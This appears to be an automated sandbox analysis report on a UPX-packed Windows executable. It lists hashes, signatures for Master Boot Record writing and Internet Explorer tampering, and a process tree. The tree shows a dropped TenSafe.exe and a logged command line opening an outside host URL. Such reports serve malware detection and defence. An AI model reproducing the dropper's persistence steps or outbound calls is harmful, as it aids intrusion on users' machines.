Overview

overview

8

Static

static

8

3d99609d29...13.exe

windows7-x64

8

3d99609d29...13.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    152s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    21-10-2022 01:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3d99609d29ff105fb98e742e269ff7ba4bc660c3378ea261eada1ecb62c56913.exe

  • Size

    43KB

  • MD5

    48e8f2d02325efc478077b9c36eea2c7

  • SHA1

    a6e42979450ee8864d2e278677e72afe79eed705

  • SHA256

    3d99609d29ff105fb98e742e269ff7ba4bc660c3378ea261eada1ecb62c56913

  • SHA512

    f4e92864f04d56852731ba91d640ce2ef30dc8e5ed327e43e4b5d25f4f0d06cc07caf82eb86ee281fe852db2492d519df9f1418659df82a44b8d1dc6f786c873

  • SSDEEP

    768:yM8E/YC30zLP70lgrL9HI/ONvRCQ7UdBuOCUgNXmXHN:NYC38bgg9GQ7+CU4XmXHN

Score
8/10
bootkitpersistenceupx

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in Windows directory 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3d99609d29ff105fb98e742e269ff7ba4bc660c3378ea261eada1ecb62c56913.exe
    "C:\Users\Admin\AppData\Local\Temp\3d99609d29ff105fb98e742e269ff7ba4bc660c3378ea261eada1ecb62c56913.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1132
    • C:\Windows\TenSafe.exe
      C:\Windows\TenSafe.exe auto
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:1680
    • C:\progra~1\Intern~1\iexplore.exe
      C:\\progra~1\\Intern~1\\iexplore.exe http://jianqiangzhe.com/AddSetup.asp?57;€UQ44457€7€5436536466$54>6<>94$EQ€6<
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:948
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:948 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1984

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\8ISXG4GI.txt
    Filesize

    603B

    MD5

    ede3c5b931f0db4389a9dee7059e2ba6

    SHA1

    903ce46a443842216c93e92ccf6e20f1e67d45a2

    SHA256

    bb9ffdd15fb2929fd1fb41ef242ae875fd7c71c6b701bec2d6e5d4dafd29f149

    SHA512

    03d026663e619a3669a60c4f61db6946d4606e1e81c8076de5e18033c73a6ce5ea0ffb2d3f5b369516459f774457d94b2945afebb7578fadd71d1f9bafbc529b

    Download Submit

  • C:\Windows\TenSafe.exe
    Filesize

    43KB

    MD5

    48e8f2d02325efc478077b9c36eea2c7

    SHA1

    a6e42979450ee8864d2e278677e72afe79eed705

    SHA256

    3d99609d29ff105fb98e742e269ff7ba4bc660c3378ea261eada1ecb62c56913

    SHA512

    f4e92864f04d56852731ba91d640ce2ef30dc8e5ed327e43e4b5d25f4f0d06cc07caf82eb86ee281fe852db2492d519df9f1418659df82a44b8d1dc6f786c873

    Download Submit

  • memory/948-61-0x0000000000000000-mapping.dmp

    Download

  • memory/1132-56-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1132-62-0x0000000075FB1000-0x0000000075FB3000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1132-64-0x0000000000230000-0x000000000024E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1132-63-0x0000000000230000-0x000000000024E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1132-66-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1132-68-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1680-57-0x0000000000000000-mapping.dmp

    Download

  • memory/1680-65-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1680-67-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

    Download